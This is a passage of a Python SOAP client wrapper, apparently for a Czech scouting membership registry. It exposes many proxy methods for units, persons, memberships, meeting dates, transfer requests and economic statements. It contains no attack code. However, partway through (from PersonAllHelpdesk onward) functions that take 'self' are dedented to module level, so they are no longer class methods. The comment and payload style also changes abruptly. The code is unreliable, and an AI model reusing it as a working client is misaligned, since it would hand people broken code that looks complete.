        return self._client.service.UnitRegistrationUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "DateChecked": DateChecked, "DateConfirmed": DateConfirmed, "IsDelivered": IsDelivered, "IsAccepted": IsAccepted, "ID_UnitRegistrationParent": ID_UnitRegistrationParent, "ParentIsDelivered": ParentIsDelivered, "ParentIsAccepted": ParentIsAccepted, "ParentHasCreated": ParentHasCreated, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "ID_UnitType": ID_UnitType, "Instructions": Instructions, "UnitRegistrationParent": UnitRegistrationParent, "InstructionsParent": InstructionsParent})
    # Load the list of subordinate units.
    def UnitTreeAll(self, ID_Login, ID_Application, ID_UnitParent, ShowHistory, IsValid):
        """Proxy for the UnitTreeAll SOAP operation; returns the service response."""
        return self._client.service.UnitTreeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_UnitParent": ID_UnitParent, "ShowHistory": ShowHistory, "IsValid": IsValid})
    # Load the detail of a unit's existence record.
    def UnitTreeDetail(self, ID_Login, ID):
        """Proxy for the UnitTreeDetail SOAP operation; returns the service response."""
        return self._client.service.UnitTreeDetail({"ID_Login": ID_Login, "ID": ID})
    # Load the list of reasons for ending a unit's existence.
    def UnitTreeReasonAll(self, ID_Login, DisplayName=None):
        """Proxy for the UnitTreeReasonAll SOAP operation; returns the service response."""
        return self._client.service.UnitTreeReasonAll({"ID_Login": ID_Login, "DisplayName": DisplayName})
    # End the existence of a unit.
    def UnitTreeUpdate(self, ID_Login, ID, ValidFrom, ValidTo, ID_Unit, ID_UnitParent, ID_UnitMerge, ID_UnitTreeReason=None, Unit=None, UnitParent=None, RegistrationNumber=None, ID_UnitType=None, UnitMerge=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
        """Proxy for the UnitTreeUpdate SOAP operation; returns the service response."""
        return self._client.service.UnitTreeUpdate({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Unit": ID_Unit, "ID_UnitParent": ID_UnitParent, "ID_UnitMerge": ID_UnitMerge, "ID_UnitTreeReason": ID_UnitTreeReason, "Unit": Unit, "UnitParent": UnitParent, "RegistrationNumber": RegistrationNumber, "ID_UnitType": ID_UnitType, "UnitMerge": UnitMerge, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
    # Load the list of unit types.
    def UnitTypeAll(self, ID_Login, DisplayName=None, ID_UnitTypeCreate=None, ID_UnitTypeParent=None):
        """Proxy for the UnitTypeAll SOAP operation; returns the service response."""
        return self._client.service.UnitTypeAll({"ID_Login": ID_Login, "DisplayName": DisplayName, "ID_UnitTypeCreate": ID_UnitTypeCreate, "ID_UnitTypeParent": ID_UnitTypeParent})
    # Update a unit.
    def UnitUpdate(self, ID_Login, ID, ID_Group, ID_Unit, ContainsMembers, CommissionDeadline, IsVatPayer, ID_TroopArt, CanUpdateRegistrationNumber, IsUnitCancel, JournalParent, ChangeFreeJournal, ID_UnitParent, OnlyValidate, IsPostalAuthenticated, IsAddressAuthenticated, ID_PersonChangeName, DateChangeName, IsPropertyOwner, ID_TempFilePropertyAgreement, ID_DocumentDecision, ID_DocumentPropertyAgreement, ID_TempFileSeatChange, ID_UnitType=None, UnitType=None, DisplayName=None, SortName=None, RegistrationNumber=None, ShortRegistrationNumber=None, Location=None, IC=None, DIC=None, FileReference=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Note=None, TroopArt=None, LogoContent=None, LogoExtension=None, AddressDistrict=None, PostalDistrict=None, NewDisplayName=None, CompleteDisplayName=None, PersonChangeName=None, PropertyAgreementExtension=None, PropertyAgreementContent=None, TroopArtKey=None, ID_JournalNovice=None, ID_JournalDeliveryType=None, FullDisplayName=None, DecisionSeatChangeExtension=None, ShopDiscountBarcode=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
        """Proxy for the UnitUpdate SOAP operation; returns the service response."""
        return self._client.service.UnitUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Group": ID_Group, "ID_Unit": ID_Unit, "ContainsMembers": ContainsMembers, "CommissionDeadline": CommissionDeadline, "IsVatPayer": IsVatPayer, "ID_TroopArt": ID_TroopArt, "CanUpdateRegistrationNumber": CanUpdateRegistrationNumber, "IsUnitCancel": IsUnitCancel, "JournalParent": JournalParent, "ChangeFreeJournal": ChangeFreeJournal, "ID_UnitParent": ID_UnitParent, "OnlyValidate": OnlyValidate, "IsPostalAuthenticated": IsPostalAuthenticated, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_PersonChangeName": ID_PersonChangeName, "DateChangeName": DateChangeName, "IsPropertyOwner": IsPropertyOwner, "ID_TempFilePropertyAgreement": ID_TempFilePropertyAgreement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "ID_TempFileSeatChange": ID_TempFileSeatChange, "ID_UnitType": ID_UnitType, "UnitType": UnitType, "DisplayName": DisplayName, "SortName": SortName, "RegistrationNumber": RegistrationNumber, "ShortRegistrationNumber": ShortRegistrationNumber, "Location": Location, "IC": IC, "DIC": DIC, "FileReference": FileReference, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Note": Note, "TroopArt": TroopArt, "LogoContent": LogoContent, "LogoExtension": LogoExtension, "AddressDistrict": AddressDistrict, "PostalDistrict": PostalDistrict, "NewDisplayName": NewDisplayName, "CompleteDisplayName": CompleteDisplayName, "PersonChangeName": PersonChangeName, "PropertyAgreementExtension": PropertyAgreementExtension, "PropertyAgreementContent": PropertyAgreementContent, "TroopArtKey": TroopArtKey, "ID_JournalNovice": ID_JournalNovice, "ID_JournalDeliveryType": ID_JournalDeliveryType, "FullDisplayName": FullDisplayName, "DecisionSeatChangeExtension": DecisionSeatChangeExtension, 
"ShopDiscountBarcode": ShopDiscountBarcode, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
    # Assign a user account to a person.
    def PersonUpdateUser(self, ID_Login, ID, Overwrite, UserName=None, SecurityCode=None):
        """Proxy for the PersonUpdateUser SOAP operation; returns the service response."""
        return self._client.service.PersonUpdateUser({"ID_Login": ID_Login, "ID": ID, "Overwrite": Overwrite, "UserName": UserName, "SecurityCode": SecurityCode})
    # Load information about a person.
    def PersonDetail(self, ID_Login, ID):
        """Proxy for the PersonDetail SOAP operation; returns the service response."""
        return self._client.service.PersonDetail({"ID_Login": ID_Login, "ID": ID})
    # Load information about a unit.
    def UnitDetail(self, ID_Login, ID_Application, ID, FindStredisko, FindUstredi):
        """Proxy for the UnitDetail SOAP operation; returns the service response."""
        return self._client.service.UnitDetail({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "FindStredisko": FindStredisko, "FindUstredi": FindUstredi})
    # Load a person's photo.
    def PersonPhoto(self, ID_Login, ID, Size=None):
        """Proxy for the PersonPhoto SOAP operation; returns the service response."""
        return self._client.service.PersonPhoto({"ID_Login": ID_Login, "ID": ID, "Size": Size})
    # Load function assignments in a unit for display in the OJ registry.
    def FunctionAllRegistry(self, ID_Login, ID_Application, ID_Unit, ReturnStatutory, ReturnAssistant, ReturnContact):
        """Proxy for the FunctionAllRegistry SOAP operation; returns the service response."""
        return self._client.service.FunctionAllRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ReturnStatutory": ReturnStatutory, "ReturnAssistant": ReturnAssistant, "ReturnContact": ReturnContact})
    # Load the list of meeting dates.
    def MeetingDateAll(self, ID_Login, ID_Application, ID_Unit, ID_Occupation, ID_WeekDay=None):
        """Proxy for the MeetingDateAll SOAP operation; returns the service response."""
        return self._client.service.MeetingDateAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_Occupation": ID_Occupation, "ID_WeekDay": ID_WeekDay})
    # Delete a meeting date.
    def MeetingDateDelete(self, ID_Login, ID):
        """Proxy for the MeetingDateDelete SOAP operation; returns the service response."""
        return self._client.service.MeetingDateDelete({"ID_Login": ID_Login, "ID": ID})
    # Load the detail of a meeting date.
    def MeetingDateDetail(self, ID_Login, ID):
        """Proxy for the MeetingDateDetail SOAP operation; returns the service response."""
        return self._client.service.MeetingDateDetail({"ID_Login": ID_Login, "ID": ID})
    # Create a meeting date.
    def MeetingDateInsert(self, ID_Login, ID, ID_Unit, ID_Occupation, DisplayName=None, Unit=None, ID_WeekDay=None, WeekDay=None, TimeFrom=None, TimeTo=None, Periodicity=None, Occupation=None):
        """Proxy for the MeetingDateInsert SOAP operation; returns the service response."""
        return self._client.service.MeetingDateInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Occupation": ID_Occupation, "DisplayName": DisplayName, "Unit": Unit, "ID_WeekDay": ID_WeekDay, "WeekDay": WeekDay, "TimeFrom": TimeFrom, "TimeTo": TimeTo, "Periodicity": Periodicity, "Occupation": Occupation})
    # Update a meeting date.
    def MeetingDateUpdate(self, ID_Login, ID, ID_Unit, ID_Occupation, DisplayName=None, Unit=None, ID_WeekDay=None, WeekDay=None, TimeFrom=None, TimeTo=None, Periodicity=None, Occupation=None):
        """Proxy for the MeetingDateUpdate SOAP operation; returns the service response."""
        return self._client.service.MeetingDateUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Occupation": ID_Occupation, "DisplayName": DisplayName, "Unit": Unit, "ID_WeekDay": ID_WeekDay, "WeekDay": WeekDay, "TimeFrom": TimeFrom, "TimeTo": TimeTo, "Periodicity": Periodicity, "Occupation": Occupation})
    # Search in the OJ (organizational unit) registry.
    def UnitAllRegistry(self, ID_Login, ID_Application, IsValid, DisplayName=None, IC=None, RegistrationNumber=None, Location=None, ParentDisplayName=None, ParentRegistrationNumber=None):
        """Proxy for the UnitAllRegistry SOAP operation; returns the service response."""
        return self._client.service.UnitAllRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "IsValid": IsValid, "DisplayName": DisplayName, "IC": IC, "RegistrationNumber": RegistrationNumber, "Location": Location, "ParentDisplayName": ParentDisplayName, "ParentRegistrationNumber": ParentRegistrationNumber})
    # Load the list of unit cancellations.
    def UnitCancelAll(self, ID_Login, ID_Application, ID_Unit, ID_Person, IsValid, ID_UnitCancelType=None):
        """Proxy for the UnitCancelAll SOAP operation; returns the service response."""
        return self._client.service.UnitCancelAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "IsValid": IsValid, "ID_UnitCancelType": ID_UnitCancelType})
    # Create a unit cancellation.
    def UnitCancelInsert(self, ID_Login, ID, ID_Unit, DateDecision, ID_Person, ValidTo, Unit=None, ID_UnitCancelType=None, UnitCancelType=None, Description=None, Person=None):
        """Proxy for the UnitCancelInsert SOAP operation; returns the service response."""
        return self._client.service.UnitCancelInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "DateDecision": DateDecision, "ID_Person": ID_Person, "ValidTo": ValidTo, "Unit": Unit, "ID_UnitCancelType": ID_UnitCancelType, "UnitCancelType": UnitCancelType, "Description": Description, "Person": Person})
    # Load the list of decision types.
    def UnitCancelTypeAll(self, ID_Login, ID_Unit, DisplayName=None):
        """Proxy for the UnitCancelTypeAll SOAP operation; returns the service response."""
        return self._client.service.UnitCancelTypeAll({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "DisplayName": DisplayName})
    # Overview of member counts according to the last closed registration.
    def UnitDetailMembersRegistry(self, ID_Login, ID_Application, ID):
        """Proxy for the UnitDetailMembersRegistry SOAP operation; returns the service response."""
        return self._client.service.UnitDetailMembersRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
    # Show unit detail in the OJ registry.
    def UnitDetailRegistry(self, ID_Login, ID_Application, ID):
        """Proxy for the UnitDetailRegistry SOAP operation; returns the service response."""
        return self._client.service.UnitDetailRegistry({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
    # Load a unit's logo.
    def UnitLogo(self, ID_Login, ID_Application, ID):
        """Proxy for the UnitLogo SOAP operation; returns the service response."""
        return self._client.service.UnitLogo({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
    # Statistics of members and units in a registration.
    def UnitRegistrationMembers(self, ID_Login, ID):
        """Proxy for the UnitRegistrationMembers SOAP operation; returns the service response."""
        return self._client.service.UnitRegistrationMembers({"ID_Login": ID_Login, "ID": ID})
    # Load the list of economic statements.
    # NOTE(review): the method name suggests it returns a statement's errors —
    # the original (Czech) comment may be stale; confirm against the WSDL.
    def StatementErrors(self, ID_Login, ID):
        """Proxy for the StatementErrors SOAP operation; returns the service response."""
        return self._client.service.StatementErrors({"ID_Login": ID_Login, "ID": ID})
    # Compute whether an economic statement contains errors.
    def StatementComputeIsError(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
        """Proxy for the StatementComputeIsError SOAP operation; returns the service response."""
        return self._client.service.StatementComputeIsError({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
    # Load the list of economic statements of subordinate units.
    def StatementAllChild(self, ID_Login, ID):
        """Proxy for the StatementAllChild SOAP operation; returns the service response."""
        return self._client.service.StatementAllChild({"ID_Login": ID_Login, "ID": ID})
    # Load economic statement entries including per-area totals.
    def StatementEntryAllTotals(self, ID_Login, ID_Statement, ID_StatementEntryType, IsMoney):
        """Proxy for the StatementEntryAllTotals SOAP operation; returns the service response."""
        return self._client.service.StatementEntryAllTotals({"ID_Login": ID_Login, "ID_Statement": ID_Statement, "ID_StatementEntryType": ID_StatementEntryType, "IsMoney": IsMoney})
    # Renew the existence of a unit.
    def UnitTreeRenew(self, ID_Login, ID, ValidFrom, ValidTo, ID_Unit, ID_UnitParent, ID_UnitMerge, ID_UnitTreeReason=None, Unit=None, UnitParent=None, RegistrationNumber=None, ID_UnitType=None, UnitMerge=None, ID_UnitFoundReason=None, UnitFoundReason=None, UnitFoundDescription=None):
        """Proxy for the UnitTreeRenew SOAP operation; returns the service response."""
        return self._client.service.UnitTreeRenew({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Unit": ID_Unit, "ID_UnitParent": ID_UnitParent, "ID_UnitMerge": ID_UnitMerge, "ID_UnitTreeReason": ID_UnitTreeReason, "Unit": Unit, "UnitParent": UnitParent, "RegistrationNumber": RegistrationNumber, "ID_UnitType": ID_UnitType, "UnitMerge": UnitMerge, "ID_UnitFoundReason": ID_UnitFoundReason, "UnitFoundReason": UnitFoundReason, "UnitFoundDescription": UnitFoundDescription})
    # Load the detail of a registration defect.
    def MistakeDetail(self, ID_Login, ID):
        """Proxy for the MistakeDetail SOAP operation; returns the service response."""
        return self._client.service.MistakeDetail({"ID_Login": ID_Login, "ID": ID})
    # Verify whether a person can be transferred to the given unit.
    def PersonDetailIdentificationCode(self, ID_Login, ID_Unit, IdentificationCode=None):
        """Proxy for the PersonDetailIdentificationCode SOAP operation; returns the service response."""
        return self._client.service.PersonDetailIdentificationCode({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IdentificationCode": IdentificationCode})
    # Load units in the same center, or all subordinate units.
    def UnitAllUnit(self, ID_Login, ID_Unit, SearchStredisko):
        """Proxy for the UnitAllUnit SOAP operation; returns the service response."""
        return self._client.service.UnitAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "SearchStredisko": SearchStredisko})
    # Renew a person's membership in a unit.
    def MembershipRenew(self, ID_Login, ID, ID_Unit, ID_Person, ID_User, ValidFrom, ValidTo, IsUnique, CreateNew, OnlyValidate, IsFunction, IsUnitFunction, IsSts, IsDelegate, PersonDateBirth, Person=None, ID_MembershipType=None, ID_MembershipCategory=None, ID_MembershipReason=None):
        """Proxy for the MembershipRenew SOAP operation; returns the service response."""
        return self._client.service.MembershipRenew({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ID_User": ID_User, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "IsUnique": IsUnique, "CreateNew": CreateNew, "OnlyValidate": OnlyValidate, "IsFunction": IsFunction, "IsUnitFunction": IsUnitFunction, "IsSts": IsSts, "IsDelegate": IsDelegate, "PersonDateBirth": PersonDateBirth, "Person": Person, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_MembershipReason": ID_MembershipReason})
# Search persons (helpdesk view).
def PersonAllHelpdesk(self, ID_Login, IsValid, FirstName=None, LastName=None, NickName=None, IdentificationCode=None, City=None, UserName=None, Email=None, Phone=None):
    """Forward all arguments as the PersonAllHelpdesk SOAP payload and return the service response."""
    return self._client.service.PersonAllHelpdesk({"ID_Login": ID_Login, "IsValid": IsValid, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "IdentificationCode": IdentificationCode, "City": City, "UserName": UserName, "Email": Email, "Phone": Phone})
# Load the list of transfer requests.
def RequestAll(self, ID_Login, ID_Person, ID_UserCreate, ID_Unit, ID_UserDecision, ID_MembershipType=None, ID_MembershipCategory=None, ID_RequestState=None):
    """Forward all arguments as the RequestAll SOAP payload and return the service response."""
    return self._client.service.RequestAll({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_UserCreate": ID_UserCreate, "ID_Unit": ID_Unit, "ID_UserDecision": ID_UserDecision, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "ID_RequestState": ID_RequestState})
def RequestDetail(self, ID_Login, ID):
    """Load the detail of a transfer request (SOAP: RequestDetail)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.RequestDetail(payload)
# Create a transfer request.
def RequestInsert(self, ID_Login, ID, ID_Person, Birthday, ValidFrom, ID_UserCreate, ID_PersonCreate, DateCreate, ID_Unit, ID_UserDecision, ID_PersonDecision, DateDecision, NewMembership, IdentificationCode=None, Person=None, ID_Sex=None, Sex=None, Reason=None, ID_MembershipType=None, MembershipType=None, ID_MembershipCategory=None, MembershipCategory=None, PersonCreate=None, Unit=None, RegistrationNumber=None, ID_RequestState=None, RequestState=None, PersonDecision=None, Decision=None):
    """Forward all arguments as the RequestInsert SOAP payload and return the service response."""
    return self._client.service.RequestInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "ValidFrom": ValidFrom, "ID_UserCreate": ID_UserCreate, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_Unit": ID_Unit, "ID_UserDecision": ID_UserDecision, "ID_PersonDecision": ID_PersonDecision, "DateDecision": DateDecision, "NewMembership": NewMembership, "IdentificationCode": IdentificationCode, "Person": Person, "ID_Sex": ID_Sex, "Sex": Sex, "Reason": Reason, "ID_MembershipType": ID_MembershipType, "MembershipType": MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "PersonCreate": PersonCreate, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_RequestState": ID_RequestState, "RequestState": RequestState, "PersonDecision": PersonDecision, "Decision": Decision})
def RequestStateAll(self, ID_Login, DisplayName=None):
    """Load the list of transfer-request states (SOAP: RequestStateAll)."""
    payload = {"ID_Login": ID_Login, "DisplayName": DisplayName}
    return self._client.service.RequestStateAll(payload)
# Update a transfer request.
def RequestUpdate(self, ID_Login, ID, ID_Person, Birthday, ValidFrom, ID_UserCreate, ID_PersonCreate, DateCreate, ID_Unit, ID_UserDecision, ID_PersonDecision, DateDecision, NewMembership, IdentificationCode=None, Person=None, ID_Sex=None, Sex=None, Reason=None, ID_MembershipType=None, MembershipType=None, ID_MembershipCategory=None, MembershipCategory=None, PersonCreate=None, Unit=None, RegistrationNumber=None, ID_RequestState=None, RequestState=None, PersonDecision=None, Decision=None):
    """Forward all arguments as the RequestUpdate SOAP payload and return the service response."""
    return self._client.service.RequestUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "ValidFrom": ValidFrom, "ID_UserCreate": ID_UserCreate, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_Unit": ID_Unit, "ID_UserDecision": ID_UserDecision, "ID_PersonDecision": ID_PersonDecision, "DateDecision": DateDecision, "NewMembership": NewMembership, "IdentificationCode": IdentificationCode, "Person": Person, "ID_Sex": ID_Sex, "Sex": Sex, "Reason": Reason, "ID_MembershipType": ID_MembershipType, "MembershipType": MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "MembershipCategory": MembershipCategory, "PersonCreate": PersonCreate, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_RequestState": ID_RequestState, "RequestState": RequestState, "PersonDecision": PersonDecision, "Decision": Decision})
def UnitRegistrationReport(self, ID_Login, ID):
    """Overview of registration comments (SOAP: UnitRegistrationReport)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.UnitRegistrationReport(payload)
def PersonAllExport(self, ID_Login, ID_Unit):
    """Detailed information about persons in a unit, for CSV export (SOAP: PersonAllExport)."""
    payload = {"ID_Login": ID_Login, "ID_Unit": ID_Unit}
    return self._client.service.PersonAllExport(payload)
def UnitRegistrationAllChild(self, ID_Login, ID_UnitRegistration):
    """Load registrations of subordinate units (SOAP: UnitRegistrationAllChild)."""
    payload = {"ID_Login": ID_Login, "ID_UnitRegistration": ID_UnitRegistration}
    return self._client.service.UnitRegistrationAllChild(payload)
# Update a historical function.
def FunctionUpdateHistory(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
    """Forward all arguments as the FunctionUpdateHistory SOAP payload and return the service response."""
    return self._client.service.FunctionUpdateHistory({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
# Create a historical function.
def FunctionInsertHistory(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
    """Forward all arguments as the FunctionInsertHistory SOAP payload and return the service response."""
    return self._client.service.FunctionInsertHistory({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
def FunctionDeleteHistory(self, ID_Login, ID):
    """Delete a historical function (SOAP: FunctionDeleteHistory)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.FunctionDeleteHistory(payload)
def QualificationDeleteHistory(self, ID_Login, ID):
    """Delete a historical qualification (SOAP: QualificationDeleteHistory)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.QualificationDeleteHistory(payload)
# Create a historical qualification.
def QualificationInsertHistory(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
    """Forward all arguments as the QualificationInsertHistory SOAP payload and return the service response."""
    return self._client.service.QualificationInsertHistory({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_QualificationType": ID_QualificationType, "IsUsed": IsUsed, "SendMessage": SendMessage, "ID_Document": ID_Document, "Person": Person, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "Note": Note})
# Update a historical qualification.
def QualificationUpdateHistory(self, ID_Login, ID_Person, ID, ValidFrom, ValidTo, ID_QualificationType, IsUsed, SendMessage, ID_Document, Person=None, QualificationType=None, LetterNumber=None, Note=None):
    """Forward all arguments as the QualificationUpdateHistory SOAP payload and return the service response."""
    return self._client.service.QualificationUpdateHistory({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_QualificationType": ID_QualificationType, "IsUsed": IsUsed, "SendMessage": SendMessage, "ID_Document": ID_Document, "Person": Person, "QualificationType": QualificationType, "LetterNumber": LetterNumber, "Note": Note})
def UnitRegistrationSummary(self, ID_Login, ID):
    """Overview of levies for superior units (SOAP: UnitRegistrationSummary)."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.UnitRegistrationSummary(payload)
# Search persons.
def PersonAllLogin(self, ID_Login, Birthday, FirstName=None, LastName=None, NickName=None, IdentificationCode=None, IdentificationCodeStartsWith=None, ID_MembershipType=None, ID_MembershipCategory=None, Phone=None, Email=None, City=None, RegistrationNumber=None):
    """Forward all arguments as the PersonAllLogin SOAP payload and return the service response."""
    return self._client.service.PersonAllLogin({"ID_Login": ID_Login, "Birthday": Birthday, "FirstName": FirstName, "LastName": LastName, "NickName": NickName, "IdentificationCode": IdentificationCode, "IdentificationCodeStartsWith": IdentificationCodeStartsWith, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory, "Phone": Phone, "Email": Email, "City": City, "RegistrationNumber": RegistrationNumber})
def PersonDetailSecurityCode(self, ID_Login, UserName=None, SecurityCode=None):
    """Load person information by security code and username (SOAP: PersonDetailSecurityCode)."""
    payload = {
        "ID_Login": ID_Login,
        "UserName": UserName,
        "SecurityCode": SecurityCode,
    }
    return self._client.service.PersonDetailSecurityCode(payload)
def PersonParseIdentificationCode(self, ID_Login, IdentificationCode=None):
    """Validate a national identification code (SOAP: PersonParseIdentificationCode)."""
    payload = {"ID_Login": ID_Login, "IdentificationCode": IdentificationCode}
    return self._client.service.PersonParseIdentificationCode(payload)
def PersonRegistrationAllPerson(self, ID_Login, ID_Person, Year, IsLastRegistration, Unit=None):
    """Load the registrations of a person (SOAP: PersonRegistrationAllPerson)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_Person": ID_Person,
        "Year": Year,
        "IsLastRegistration": IsLastRegistration,
        "Unit": Unit,
    }
    return self._client.service.PersonRegistrationAllPerson(payload)
# Load the list of a person's functions.
def FunctionAllPerson(self, ID_Login, ID_Person, ID_Unit, ID_FunctionType, ShowHistory, IsOficial, IsValid, ID_FunctionReason=None):
    """Forward all arguments as the FunctionAllPerson SOAP payload and return the service response."""
    return self._client.service.FunctionAllPerson({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ShowHistory": ShowHistory, "IsOficial": IsOficial, "IsValid": IsValid, "ID_FunctionReason": ID_FunctionReason})
# Load the list of a person's memberships in units.
def MembershipAllPerson(self, ID_Login, ID_Person, ID_Unit, ShowHistory, IsValid, ID_MembershipType=None, ID_MembershipCategory=None):
    """Forward all arguments as the MembershipAllPerson SOAP payload and return the service response."""
    return self._client.service.MembershipAllPerson({"ID_Login": ID_Login, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ShowHistory": ShowHistory, "IsValid": IsValid, "ID_MembershipType": ID_MembershipType, "ID_MembershipCategory": ID_MembershipCategory})
def PersonAllRegistrationCategory(self, ID_Login, ID_RegistrationCategory, ID, IncludeChild):
    """List users not registered in the unit registration matching the given category (SOAP: PersonAllRegistrationCategory)."""
    payload = {
        "ID_Login": ID_Login,
        "ID_RegistrationCategory": ID_RegistrationCategory,
        "ID": ID,
        "IncludeChild": IncludeChild,
    }
